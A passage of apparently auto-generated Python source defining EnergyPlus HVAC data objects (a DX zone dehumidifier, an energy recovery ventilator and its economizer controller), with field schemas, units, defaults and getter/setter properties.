(u'air inlet node name',
{'name': u'Air Inlet Node Name',
'pyname': u'air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'air outlet node name',
{'name': u'Air Outlet Node Name',
'pyname': u'air_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'rated water removal',
{'name': u'Rated Water Removal',
'pyname': u'rated_water_removal',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'L/day'}),
(u'rated energy factor',
{'name': u'Rated Energy Factor',
'pyname': u'rated_energy_factor',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'L/kWh'}),
(u'rated air flow rate',
{'name': u'Rated Air Flow Rate',
'pyname': u'rated_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'water removal curve name',
{'name': u'Water Removal Curve Name',
'pyname': u'water_removal_curve_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'energy factor curve name',
{'name': u'Energy Factor Curve Name',
'pyname': u'energy_factor_curve_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'part load fraction correlation curve name',
{'name': u'Part Load Fraction Correlation Curve Name',
'pyname': u'part_load_fraction_correlation_curve_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'minimum dry-bulb temperature for dehumidifier operation',
{'name': u'Minimum Dry-Bulb Temperature for Dehumidifier Operation',
'pyname': u'minimum_drybulb_temperature_for_dehumidifier_operation',
'default': 10.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'maximum dry-bulb temperature for dehumidifier operation',
{'name': u'Maximum Dry-Bulb Temperature for Dehumidifier Operation',
'pyname': u'maximum_drybulb_temperature_for_dehumidifier_operation',
'default': 35.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'off-cycle parasitic electric load',
{'name': u'Off-Cycle Parasitic Electric Load',
'pyname': u'offcycle_parasitic_electric_load',
'default': 0.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'W'}),
(u'condensate collection water storage tank name',
{'name': u'Condensate Collection Water Storage Tank Name',
'pyname': u'condensate_collection_water_storage_tank_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 13,
'name': u'ZoneHVAC:Dehumidifier:DX',
'pyname': u'ZoneHvacDehumidifierDx',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| Unique name for this direct expansion (DX) zone dehumidifier object.
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
| Schedule values of 0 denote the unit is off.
| Schedule values >0.0 (usually 1.0) indicate that the dehumidifier is available to operate.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def air_inlet_node_name(self):
"""field `Air Inlet Node Name`
| Air inlet node for the dehumidifier must be a zone air exhaust node.
Args:
value (str): value for IDD Field `Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_inlet_node_name` or None if not set
"""
return self["Air Inlet Node Name"]
@air_inlet_node_name.setter
def air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Inlet Node Name`"""
self["Air Inlet Node Name"] = value
@property
def air_outlet_node_name(self):
"""field `Air Outlet Node Name`
| Air outlet node for the dehumidifier must be a zone air inlet node.
Args:
value (str): value for IDD Field `Air Outlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_outlet_node_name` or None if not set
"""
return self["Air Outlet Node Name"]
@air_outlet_node_name.setter
def air_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Outlet Node Name`"""
self["Air Outlet Node Name"] = value
@property
def rated_water_removal(self):
"""field `Rated Water Removal`
| Rating point: air entering dehumidifier at 26.7 C (80 F) dry-bulb and 60% relative humidity.
| Units: L/day
Args:
value (float): value for IDD Field `Rated Water Removal`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `rated_water_removal` or None if not set
"""
return self["Rated Water Removal"]
@rated_water_removal.setter
def rated_water_removal(self, value=None):
"""Corresponds to IDD field `Rated Water Removal`"""
self["Rated Water Removal"] = value
@property
def rated_energy_factor(self):
"""field `Rated Energy Factor`
| Rating point: air entering dehumidifier at 26.7 C (80 F) dry-bulb and 60% relative humidity.
| Units: L/kWh
Args:
value (float): value for IDD Field `Rated Energy Factor`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `rated_energy_factor` or None if not set
"""
return self["Rated Energy Factor"]
@rated_energy_factor.setter
def rated_energy_factor(self, value=None):
"""Corresponds to IDD field `Rated Energy Factor`"""
self["Rated Energy Factor"] = value
@property
def rated_air_flow_rate(self):
"""field `Rated Air Flow Rate`
| Units: m3/s
Args:
value (float): value for IDD Field `Rated Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `rated_air_flow_rate` or None if not set
"""
return self["Rated Air Flow Rate"]
@rated_air_flow_rate.setter
def rated_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Rated Air Flow Rate`"""
self["Rated Air Flow Rate"] = value
@property
def water_removal_curve_name(self):
"""field `Water Removal Curve Name`
| Name of a curve that describes the water removal rate (normalized to rated conditions)
| as a function of the dry-bulb temperature and relative humidity of the air
| entering the dehumidifier.
| Curve output = (actual water removal/rated water removal) = a + b*T + c*T**2 + d*RH +
| e*RH**2 + f*T*RH
| T = inlet air dry-bulb temperature (C)
| RH = inlet air RH (%)
Args:
value (str): value for IDD Field `Water Removal Curve Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `water_removal_curve_name` or None if not set
"""
return self["Water Removal Curve Name"]
@water_removal_curve_name.setter
def water_removal_curve_name(self, value=None):
"""Corresponds to IDD field `Water Removal Curve Name`"""
self["Water Removal Curve Name"] = value
@property
def energy_factor_curve_name(self):
"""field `Energy Factor Curve Name`
| Name of a curve that describes the energy factor (normalized to rated conditions)
| as a function of the dry-bulb temperature and relative humidity of the air
| entering the dehumidifier.
| Curve output = (actual energy factor/rated energy factor) = a + b*T + c*T**2 + d*RH +
| e*RH**2 + f*T*RH
| T = inlet air dry-bulb temperature (C)
| RH = inlet air RH (%)
Args:
value (str): value for IDD Field `Energy Factor Curve Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `energy_factor_curve_name` or None if not set
"""
return self["Energy Factor Curve Name"]
@energy_factor_curve_name.setter
def energy_factor_curve_name(self, value=None):
"""Corresponds to IDD field `Energy Factor Curve Name`"""
self["Energy Factor Curve Name"] = value
@property
def part_load_fraction_correlation_curve_name(self):
"""field `Part Load Fraction Correlation Curve Name`
| Name of a curve that describes the part load fraction (PLF) of the system as
| a function of the part load ratio. Used to calculate dehumidifier run time fraction
| and electric power.
| quadratic curve = a + b*PLR + c*PLR**2
| cubic curve = a + b*PLR + c*PLR**2 + d*PLR**3
| PLR = part load ratio (dehumidification load/steady state water removal capacity)
Args:
value (str): value for IDD Field `Part Load Fraction Correlation Curve Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `part_load_fraction_correlation_curve_name` or None if not set
"""
return self["Part Load Fraction Correlation Curve Name"]
@part_load_fraction_correlation_curve_name.setter
def part_load_fraction_correlation_curve_name(self, value=None):
"""Corresponds to IDD field `Part Load Fraction Correlation Curve
Name`"""
self["Part Load Fraction Correlation Curve Name"] = value
@property
def minimum_drybulb_temperature_for_dehumidifier_operation(self):
"""field `Minimum Dry-Bulb Temperature for Dehumidifier Operation`
| Dehumidifier shut off if inlet air (zone) temperature is below this value.
| This value must be less than the Maximum Dry-Bulb Temperature for Dehumidifier Operation.
| Units: C
| Default value: 10.0
Args:
value (float): value for IDD Field `Minimum Dry-Bulb Temperature for Dehumidifier Operation`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_drybulb_temperature_for_dehumidifier_operation` or None if not set
"""
return self["Minimum Dry-Bulb Temperature for Dehumidifier Operation"]
@minimum_drybulb_temperature_for_dehumidifier_operation.setter
def minimum_drybulb_temperature_for_dehumidifier_operation(
self,
value=10.0):
""" Corresponds to IDD field `Minimum Dry-Bulb Temperature for Dehumidifier Operation`
"""
self["Minimum Dry-Bulb Temperature for Dehumidifier Operation"] = value
@property
def maximum_drybulb_temperature_for_dehumidifier_operation(self):
"""field `Maximum Dry-Bulb Temperature for Dehumidifier Operation`
| Dehumidifier shut off if inlet air (zone) temperature is above this value.
| This value must be greater than the Minimum Dry-Bulb Temperature for Dehumidifier Operation.
| Units: C
| Default value: 35.0
Args:
value (float): value for IDD Field `Maximum Dry-Bulb Temperature for Dehumidifier Operation`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_drybulb_temperature_for_dehumidifier_operation` or None if not set
"""
return self["Maximum Dry-Bulb Temperature for Dehumidifier Operation"]
@maximum_drybulb_temperature_for_dehumidifier_operation.setter
def maximum_drybulb_temperature_for_dehumidifier_operation(
self,
value=35.0):
""" Corresponds to IDD field `Maximum Dry-Bulb Temperature for Dehumidifier Operation`
"""
self["Maximum Dry-Bulb Temperature for Dehumidifier Operation"] = value
@property
def offcycle_parasitic_electric_load(self):
"""field `Off-Cycle Parasitic Electric Load`
| Parasitic electric power consumed when the dehumidifier is available to operate, but
| does not operate (i.e., no high humidity load to be met).
| Off cycle parasitic power is 0 when the availability schedule is 0.
| This electric load is considered as a heat gain to the zone air.
| Units: W
Args:
value (float): value for IDD Field `Off-Cycle Parasitic Electric Load`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `offcycle_parasitic_electric_load` or None if not set
"""
return self["Off-Cycle Parasitic Electric Load"]
@offcycle_parasitic_electric_load.setter
def offcycle_parasitic_electric_load(self, value=None):
""" Corresponds to IDD field `Off-Cycle Parasitic Electric Load`
"""
self["Off-Cycle Parasitic Electric Load"] = value
@property
def condensate_collection_water_storage_tank_name(self):
"""field `Condensate Collection Water Storage Tank Name`
| Name of storage tank used to collect water removed by the dehumidifier.
Args:
value (str): value for IDD Field `Condensate Collection Water Storage Tank Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `condensate_collection_water_storage_tank_name` or None if not set
"""
return self["Condensate Collection Water Storage Tank Name"]
@condensate_collection_water_storage_tank_name.setter
def condensate_collection_water_storage_tank_name(self, value=None):
"""Corresponds to IDD field `Condensate Collection Water Storage Tank
Name`"""
self["Condensate Collection Water Storage Tank Name"] = value
class ZoneHvacEnergyRecoveryVentilator(DataObject):
""" Corresponds to IDD object `ZoneHVAC:EnergyRecoveryVentilator`
This compound component models a stand-alone energy recovery ventilator (ERV)
that conditions outdoor ventilation air and supplies that air directly to a zone.
The ERV unit is modeled as a collection of components: air-to-air heat exchanger,
supply air fan, exhaust air fan and an optional controller to avoid overheating
of the supply air (economizer or free cooling operation).
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heat exchanger name',
{'name': u'Heat Exchanger Name',
'pyname': u'heat_exchanger_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'supply air flow rate',
{'name': u'Supply Air Flow Rate',
'pyname': u'supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'exhaust air flow rate',
{'name': u'Exhaust Air Flow Rate',
'pyname': u'exhaust_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'exhaust air fan name',
{'name': u'Exhaust Air Fan Name',
'pyname': u'exhaust_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'controller name',
{'name': u'Controller Name',
'pyname': u'controller_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'ventilation rate per unit floor area',
{'name': u'Ventilation Rate per Unit Floor Area',
'pyname': u'ventilation_rate_per_unit_floor_area',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-m2'}),
(u'ventilation rate per occupant',
{'name': u'Ventilation Rate per Occupant',
'pyname': u'ventilation_rate_per_occupant',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s-person'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 7,
'name': u'ZoneHVAC:EnergyRecoveryVentilator',
'pyname': u'ZoneHvacEnergyRecoveryVentilator',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def heat_exchanger_name(self):
"""field `Heat Exchanger Name`
| Heat exchanger type must be HeatExchanger:AirToAir:SensibleAndLatent
Args:
value (str): value for IDD Field `Heat Exchanger Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heat_exchanger_name` or None if not set
"""
return self["Heat Exchanger Name"]
@heat_exchanger_name.setter
def heat_exchanger_name(self, value=None):
"""Corresponds to IDD field `Heat Exchanger Name`"""
self["Heat Exchanger Name"] = value
@property
def supply_air_flow_rate(self):
"""field `Supply Air Flow Rate`
| This flow rate must match the supply fan's air flow rate.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `supply_air_flow_rate` or None if not set
"""
return self["Supply Air Flow Rate"]
@supply_air_flow_rate.setter
def supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Supply Air Flow Rate`"""
self["Supply Air Flow Rate"] = value
@property
def exhaust_air_flow_rate(self):
"""field `Exhaust Air Flow Rate`
| This flow rate must match the supply fan air flow rate.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Exhaust Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `exhaust_air_flow_rate` or None if not set
"""
return self["Exhaust Air Flow Rate"]
@exhaust_air_flow_rate.setter
def exhaust_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Exhaust Air Flow Rate`"""
self["Exhaust Air Flow Rate"] = value
@property
def supply_air_fan_name(self):
"""field `Supply Air Fan Name`
| Fan type must be Fan:OnOff
Args:
value (str): value for IDD Field `Supply Air Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_name` or None if not set
"""
return self["Supply Air Fan Name"]
@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Name`"""
self["Supply Air Fan Name"] = value
@property
def exhaust_air_fan_name(self):
"""field `Exhaust Air Fan Name`
| Fan type must be Fan:OnOff
Args:
value (str): value for IDD Field `Exhaust Air Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `exhaust_air_fan_name` or None if not set
"""
return self["Exhaust Air Fan Name"]
@exhaust_air_fan_name.setter
def exhaust_air_fan_name(self, value=None):
"""Corresponds to IDD field `Exhaust Air Fan Name`"""
self["Exhaust Air Fan Name"] = value
@property
def controller_name(self):
"""field `Controller Name`
| Enter the name of a ZoneHVAC:EnergyRecoveryVentilator:Controller object.
Args:
value (str): value for IDD Field `Controller Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `controller_name` or None if not set
"""
return self["Controller Name"]
@controller_name.setter
def controller_name(self, value=None):
"""Corresponds to IDD field `Controller Name`"""
self["Controller Name"] = value
@property
def ventilation_rate_per_unit_floor_area(self):
"""field `Ventilation Rate per Unit Floor Area`
| 0.000508 m3/s-m2 corresponds to 0.1 ft3/min-ft2
| Used only when supply and exhaust air flow rates are autosized.
| Units: m3/s-m2
Args:
value (float): value for IDD Field `Ventilation Rate per Unit Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `ventilation_rate_per_unit_floor_area` or None if not set
"""
return self["Ventilation Rate per Unit Floor Area"]
@ventilation_rate_per_unit_floor_area.setter
def ventilation_rate_per_unit_floor_area(self, value=None):
"""Corresponds to IDD field `Ventilation Rate per Unit Floor Area`"""
self["Ventilation Rate per Unit Floor Area"] = value
@property
def ventilation_rate_per_occupant(self):
"""field `Ventilation Rate per Occupant`
| 0.00236 m3/s-person corresponds to 5 ft3/min-person
| Used only when supply and exhaust air flow rates are autosized.
| Units: m3/s-person
Args:
value (float): value for IDD Field `Ventilation Rate per Occupant`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `ventilation_rate_per_occupant` or None if not set
"""
return self["Ventilation Rate per Occupant"]
@ventilation_rate_per_occupant.setter
def ventilation_rate_per_occupant(self, value=None):
"""Corresponds to IDD field `Ventilation Rate per Occupant`"""
self["Ventilation Rate per Occupant"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
class ZoneHvacEnergyRecoveryVentilatorController(DataObject):
""" Corresponds to IDD object `ZoneHVAC:EnergyRecoveryVentilator:Controller`
This controller is used exclusively by the ZoneHVAC:EnergyRecoveryVentilator object
to allow economizer (free cooling) operation when possible.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'temperature high limit',
{'name': u'Temperature High Limit',
'pyname': u'temperature_high_limit',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'temperature low limit',
{'name': u'Temperature Low Limit',
'pyname': u'temperature_low_limit',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'enthalpy high limit',
{'name': u'Enthalpy High Limit',
'pyname': u'enthalpy_high_limit',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg'}),
(u'dewpoint temperature limit',
{'name': u'Dewpoint Temperature Limit',
'pyname': u'dewpoint_temperature_limit',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'electronic enthalpy limit curve name',
{'name': u'Electronic Enthalpy Limit Curve Name',
'pyname': u'electronic_enthalpy_limit_curve_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'exhaust air temperature limit',
{'name': u'Exhaust Air Temperature Limit',
'pyname': u'exhaust_air_temperature_limit',
'default': u'NoExhaustAirTemperatureLimit',
'required-field': False,
'autosizable': False,
'accepted-values': [u'ExhaustAirTemperatureLimit',
u'NoExhaustAirTemperatureLimit'],
'autocalculatable': False,
'type': 'alpha'}),
(u'exhaust air enthalpy limit',
{'name': u'Exhaust Air Enthalpy Limit',
'pyname': u'exhaust_air_enthalpy_limit',
'default': u'NoExhaustAirEnthalpyLimit',
'required-field': False,
'autosizable': False,
'accepted-values': [u'ExhaustAirEnthalpyLimit',
u'NoExhaustAirEnthalpyLimit'],
'autocalculatable': False,
'type': 'alpha'}),
(u'time of day economizer flow control schedule name',
{'name': u'Time of Day Economizer Flow Control Schedule Name',
'pyname': u'time_of_day_economizer_flow_control_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'high humidity control flag',
{'name': u'High Humidity Control Flag',
'pyname': u'high_humidity_control_flag',
'default': u'No',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Yes',
u'No'],
'autocalculatable': False,
'type': 'alpha'}),
(u'humidistat control zone name',
{'name': u'Humidistat Control Zone Name',
'pyname': u'humidistat_control_zone_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'high humidity outdoor air flow ratio',
{'name': u'High Humidity Outdoor Air Flow Ratio',
'pyname': u'high_humidity_outdoor_air_flow_ratio',
'default': 1.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'control high indoor humidity based on outdoor humidity ratio',
{'name': u'Control High Indoor Humidity Based on Outdoor Humidity Ratio',
'pyname': u'control_high_indoor_humidity_based_on_outdoor_humidity_ratio',
'default': u'Yes',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Yes',
u'No'],
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 3,
'name': u'ZoneHVAC:EnergyRecoveryVentilator:Controller',
'pyname': u'ZoneHvacEnergyRecoveryVentilatorController',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def temperature_high_limit(self):
"""field `Temperature High Limit`
| Enter the maximum outdoor dry-bulb temperature limit for economizer operation.
| No input or blank input means this limit is not operative
| Units: C
Args:
value (float): value for IDD Field `Temperature High Limit`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_high_limit` or None if not set
"""
return self["Temperature High Limit"]
@temperature_high_limit.setter
def temperature_high_limit(self, value=None):
"""Corresponds to IDD field `Temperature High Limit`"""
self["Temperature High Limit"] = value
@property
def temperature_low_limit(self):
"""field `Temperature Low Limit`
| Enter the minimum outdoor dry-bulb temperature limit for economizer operation.
| No input or blank input means this limit is not operative
| Units: C
Args:
value (float): value for IDD Field `Temperature Low Limit`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `temperature_low_limit` or None if not set
"""
return self["Temperature Low Limit"]
@temperature_low_limit.setter
def temperature_low_limit(self, value=None):
"""Corresponds to IDD field `Temperature Low Limit`"""
self["Temperature Low Limit"] = value
@property
def enthalpy_high_limit(self):
"""field `Enthalpy High Limit`
| Enter the maximum outdoor enthalpy limit for economizer operation.
| No input or blank input means this limit is not operative
| Units: J/kg
Args:
value (float): value for IDD Field `Enthalpy High Limit`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `enthalpy_high_limit` or None if not set
"""
return self["Enthalpy High Limit"]
@enthalpy_high_limit.setter
def enthalpy_high_limit(self, value=None):
"""Corresponds to IDD field `Enthalpy High Limit`"""
self["Enthalpy High Limit"] = value
@property
def dewpoint_temperature_limit(self):
"""field `Dewpoint Temperature Limit`
| Enter the maximum outdoor dew point temperature limit for economizer operation.
| No input or blank input means this limit is not operative
| Units: C
Args:
value (float): value for IDD Field `Dewpoint Temperature Limit`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `dewpoint_temperature_limit` or None if not set
"""
return self["Dewpoint Temperature Limit"]
@dewpoint_temperature_limit.setter
def dewpoint_temperature_limit(self, value=None):
"""Corresponds to IDD field `Dewpoint Temperature Limit`"""
self["Dewpoint Temperature Limit"] = value
@property
def electronic_enthalpy_limit_curve_name(self):
"""field `Electronic Enthalpy Limit Curve Name`
| Enter the name of a quadratic or cubic curve which defines the maximum outdoor
| humidity ratio (function of outdoor dry-bulb temperature) for economizer operation.
| No input or blank input means this limit is not operative
Args:
value (str): value for IDD Field `Electronic Enthalpy Limit Curve Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `electronic_enthalpy_limit_curve_name` or None if not set
"""
return self["Electronic Enthalpy Limit Curve Name"]
@electronic_enthalpy_limit_curve_name.setter
def electronic_enthalpy_limit_curve_name(self, value=None):
"""Corresponds to IDD field `Electronic Enthalpy Limit Curve Name`"""
self["Electronic Enthalpy Limit Curve Name"] = value
@property
def exhaust_air_temperature_limit(self):
"""field `Exhaust Air Temperature Limit`
| Default value: NoExhaustAirTemperatureLimit
Args:
value (str): value for IDD Field `Exhaust Air Temperature Limit`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `exhaust_air_temperature_limit` or None if not set
"""
return self["Exhaust Air Temperature Limit"]
@exhaust_air_temperature_limit.setter
def exhaust_air_temperature_limit(
self,
value="NoExhaustAirTemperatureLimit"):
"""Corresponds to IDD field `Exhaust Air Temperature Limit`"""
self["Exhaust Air Temperature Limit"] = value
@property
def exhaust_air_enthalpy_limit(self):
"""field `Exhaust Air Enthalpy Limit`
| Default value: NoExhaustAirEnthalpyLimit
Args:
value (str): value for IDD Field `Exhaust Air Enthalpy Limit`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `exhaust_air_enthalpy_limit` or None if not set
"""
return self["Exhaust Air Enthalpy Limit"]
@exhaust_air_enthalpy_limit.setter
def exhaust_air_enthalpy_limit(self, value="NoExhaustAirEnthalpyLimit"):
"""Corresponds to IDD field `Exhaust Air Enthalpy Limit`"""
self["Exhaust Air Enthalpy Limit"] = value
@property
def time_of_day_economizer_flow_control_schedule_name(self):
"""field `Time of Day Economizer Flow Control Schedule Name`
| Schedule values greater than 0 indicate economizer operation is active. This
| schedule may be used with or without the High Humidity Control option.
| When used together, high humidity control has priority over economizer control.
Args:
value (str): value for IDD Field `Time of Day Economizer Flow Control Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `time_of_day_economizer_flow_control_schedule_name` or None if not set
"""
return self["Time of Day Economizer Flow Control Schedule Name"]
@time_of_day_economizer_flow_control_schedule_name.setter
def time_of_day_economizer_flow_control_schedule_name(self, value=None):
"""Corresponds to IDD field `Time of Day Economizer Flow Control
Schedule Name`"""
self["Time of Day Economizer Flow Control Schedule Name"] = value
@property
def high_humidity_control_flag(self):
"""field `High Humidity Control Flag`
| Select Yes to modify air flow rates based on a zone humidistat.
| Select No to disable this feature.
| Default value: No
Args:
value (str): value for IDD Field `High Humidity Control Flag`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `high_humidity_control_flag` or None if not set
"""
return self["High Humidity Control Flag"]
@high_humidity_control_flag.setter
def high_humidity_control_flag(self, value="No"):
"""Corresponds to IDD field `High Humidity Control Flag`"""
self["High Humidity Control Flag"] = value
@property
def humidistat_control_zone_name(self):
"""field `Humidistat Control Zone Name`
| Enter the name of the zone where the humidistat is located.
Args:
value (str): value for IDD Field `Humidistat Control Zone Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `humidistat_control_zone_name` or None if not set
"""
return self["Humidistat Control Zone Name"]
@humidistat_control_zone_name.setter
def humidistat_control_zone_name(self, value=None):
"""Corresponds to IDD field `Humidistat Control Zone Name`"""
self["Humidistat Control Zone Name"] = value
@property
def high_humidity_outdoor_air_flow_ratio(self):
"""field `High Humidity Outdoor Air Flow Ratio`
| Enter the ratio of supply (outdoor) air to the maximum supply air flow rate when modified
| air flow rates are active based on high indoor humidity.
| Default value: 1.0
Args:
value (float): value for IDD Field `High Humidity Outdoor Air Flow Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `high_humidity_outdoor_air_flow_ratio` or None if not set
"""
return self["High Humidity Outdoor Air Flow Ratio"]
@high_humidity_outdoor_air_flow_ratio.setter
def high_humidity_outdoor_air_flow_ratio(self, value=1.0):
"""Corresponds to IDD field `High Humidity Outdoor Air Flow Ratio`"""
self["High Humidity Outdoor Air Flow Ratio"] = value
@property
def control_high_indoor_humidity_based_on_outdoor_humidity_ratio(self):
"""field `Control High Indoor Humidity Based on Outdoor Humidity Ratio`
| If NO is selected, the air flow rate is modified any time indoor relative
